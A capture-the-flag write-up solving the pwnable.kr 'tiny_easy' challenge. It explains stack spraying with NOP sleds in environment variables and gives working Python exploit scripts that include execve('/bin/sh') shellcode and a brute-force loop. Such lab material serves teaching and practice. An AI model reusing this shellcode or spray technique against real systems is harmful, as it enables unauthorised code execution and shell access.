Problem solving with pwnable.kr 27 - tiny_easy. Understanding Stack Spraying


In this article, we will solve the 27th task from the site pwnable.kr and we will understand what Stack spraying is.

Organizational Information

The categories covered:

  • PWN;
  • Crypto;
  • Network;
  • Reverse Engineering;
  • Stegano;
  • WEB.

Solution to the tiny_easy task


Click on the icon labeled tiny_easy. We are given the address and port for connecting via ssh.


After connecting via SSH we see the flag file and the program binary, this time without source code.


Checking the binary's protections shows that none are enabled; in particular the stack is executable (no NX), which is what allows shellcode placed in environment variables to run later.


Load the program into a disassembler. The file is very small and consists of just a few instructions.


At the very beginning the program pops a value from the stack into EAX, then pops the next one into EDX, reads the four bytes EDX points to back into EDX and calls that address. But what is on the stack when the program starts? At process entry on Linux the stack holds argc (the number of program arguments), followed by the argv pointers (one per argument, NULL-terminated) and then the envp pointers (one per environment variable, also NULL-terminated).


So the first pop takes argc, and EDX receives argv[0], a pointer to the first program argument, which is normally the full path of the executable. The program then loads the first four bytes of that string and tries to jump to them as if they were an address; nothing is mapped there, so the application crashes. Running it confirms the crash.


Stack spraying is a technique in which the attacker fills a large region of the stack with controlled data, typically many copies of a NOP sled followed by shellcode, so that a jump to an imprecisely guessed stack address is likely to land somewhere inside the sprayed data. This raises the chance that an exploit which redirects the execution flow succeeds. It is important to understand that spraying by itself does no harm: without a separate bug that lets you hijack control flow, the sprayed data is just data. The technique relies on the stack's position in the process address space being predictable, or at least only narrowly randomized.

When the operating system creates a process it allocates an address space containing the user's data, the executable code and some system-specific bookkeeping. The stack segment holds variables with automatic storage class and the per-call bookkeeping of each function invocation: saved registers, the saved frame pointer and the return address (static variables, by contrast, live in the data segment, not on the stack). On Linux the kernel also copies the program arguments and the environment strings onto the top of the stack at exec time, and that is what stack spraying exploits here: we place the payload in environment variables, and it ends up on the stack.

This way we can place the shellcode on the stack through environment variables. But we put a long run of NOP instructions (0x90) in front of it, because with ASLR the stack moves between runs and we are unlikely to guess the exact address: landing anywhere in the sled slides execution down into the shellcode.

import subprocess

# Python 3: the payload must be bytes so that \x90 etc. stay raw bytes instead of being UTF-8 encoded.
# A 4096-byte NOP sled followed by the classic 45-byte x86 execve("/bin/sh") shellcode.
payload = b"\x90"*4096 + b"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"


Stack addresses on this target start with 0xff, so we pick an arbitrary address in that range, for example 0xffb5afb0, and pass it as argv[0] in little-endian byte order, since that is where the binary reads its jump target from:

addr = b"\xb0\xaf\xb5\xff"  # 0xffb5afb0, little-endian; becomes argv[0]


Now we create a number of environment variables, each holding a copy of the payload, so that more of the stack is covered and the probability of hitting a sled is higher.

envs = {}
for i in range(0, 100):
    envs["env" + str(i)] = payload  # 100 copies, roughly 400 KB of sled + shellcode on the stack

And we run the program over and over with these parameters until a guess lands inside a sled.

while True:
	# argv[0] is the guessed address; the binary reads its first four bytes and calls them.
	# A miss dies with SIGSEGV or SIGILL and we simply try again with the same guess.
	p = subprocess.Popen([addr], executable="/home/tiny_easy/tiny_easy", env=envs)
	p.wait()

After a number of attempts the guessed address lands in one of the NOP sleds and we get a shell.
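To make the procedure above and the "we are unlikely to hit the exact address" reasoning concrete, here is a consolidated Python 3 version of the spray with the attempt-count estimate made explicit. This is an added example, not the article's code: the helper names, the NUL-byte check, the MAX_ARG_STRLEN limit and the 8 MiB stack-randomization range used for the estimate are assumptions of this example; the target path, guessed address and shellcode are the ones from the article.

```python
"""Stack spraying against tiny_easy: consolidated exploit plus a hit-rate estimate.

Added example, not the original article's code. Assumptions (not on the page):
an 8 MiB stack ASLR range (32-bit Linux default), a 128 KiB MAX_ARG_STRLEN
per environment string, and the helper names below.
"""
import struct
import subprocess

TARGET = "/home/tiny_easy/tiny_easy"  # path from the article

# Classic 45-byte x86 execve("/bin/sh") shellcode used in the article.
# It patches itself (mov [esi+8], esi), so it must sit in writable memory;
# environment strings on the stack are writable, so that is fine here.
SHELLCODE = (
    b"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    b"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    b"\x80\xe8\xdc\xff\xff\xff/bin/sh"
)

MAX_ARG_STRLEN = 128 * 1024   # assumed Linux per-string limit for argv/envp
STACK_RAND_RANGE = 8 << 20    # assumed stack ASLR range on 32-bit Linux


def pack_addr(addr: int) -> bytes:
    """Little-endian 32-bit address to pass as argv[0].

    The binary dereferences argv[0] and calls the 4 bytes it finds, so the
    address is the string itself. argv[0] is a C string: a NUL byte would
    truncate it, so such addresses cannot be delivered this way.
    """
    packed = struct.pack("<I", addr)
    if b"\x00" in packed:
        raise ValueError("address contains a NUL byte: %#x" % addr)
    return packed


def build_payload(sled_len: int = 4096) -> bytes:
    """NOP sled followed by the shellcode; 0x90 is a 1-byte instruction,
    so landing on any sled byte slides into the shellcode."""
    return b"\x90" * sled_len + SHELLCODE


def build_env(payload: bytes, copies: int = 100) -> dict:
    """copies environment variables, each holding one sled+shellcode."""
    if len(payload) + len("env999=") >= MAX_ARG_STRLEN:
        raise ValueError("environment string would exceed MAX_ARG_STRLEN")
    return {"env%d" % i: payload for i in range(copies)}


def hit_probability(sled_len: int, copies: int, rand_range: int = STACK_RAND_RANGE) -> float:
    """P(a fixed guessed address lands in a sled or on the shellcode start).

    Every sled byte plus the first shellcode byte is a valid entry point,
    so each copy contributes sled_len + 1 usable bytes; the guess is uniform
    over the assumed randomization range.
    """
    window = copies * (sled_len + 1)
    return min(1.0, window / rand_range)


def expected_attempts(p: float) -> float:
    """Geometric distribution: mean number of runs until the first hit."""
    return 1.0 / p


def spray(addr_bytes: bytes, envs: dict, max_attempts=None) -> int:
    """Run the target with the guessed address as argv[0] until it stops
    dying from a signal (a shell was spawned) or max_attempts is reached.
    Returns the number of attempts made."""
    attempts = 0
    while max_attempts is None or attempts < max_attempts:
        attempts += 1
        p = subprocess.Popen([addr_bytes], executable=TARGET, env=envs)
        p.wait()
        if p.returncode >= 0:        # negative == killed by a signal (SIGSEGV is -11)
            return attempts
    return attempts


if __name__ == "__main__":
    p_hit = hit_probability(4096, 100)
    print("P(hit) per run ~ %.3f, about %.0f attempts expected" % (p_hit, expected_attempts(p_hit)))
    spray(pack_addr(0xffb5afb0), build_env(build_payload()))
```

With the article's parameters (100 variables, 4096-byte sleds) the sprayed window is about 400 KB; against an assumed 8 MiB randomization range that is a hit rate of roughly 5% per run, so the loop typically needs on the order of twenty attempts. Doubling the number of copies or the sled length halves the expected number of runs, up to the kernel's argument-size limits.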


Furthermore, you can join us on Telegram. Let's build a community of people versed in many areas of IT, so that we can always help each other on any IT and information security issue.

Source: https://habr.com/ru/post/undefined/

